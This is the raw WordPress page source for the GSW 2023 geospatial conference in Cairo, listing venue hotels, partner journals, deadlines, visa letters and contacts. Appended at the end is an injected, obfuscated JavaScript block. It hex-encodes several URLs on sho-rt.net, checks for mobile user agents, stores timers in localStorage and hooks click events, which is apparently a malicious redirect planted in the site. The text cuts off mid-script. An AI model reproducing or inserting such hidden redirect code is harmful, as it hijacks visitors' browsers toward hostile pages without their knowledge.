link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 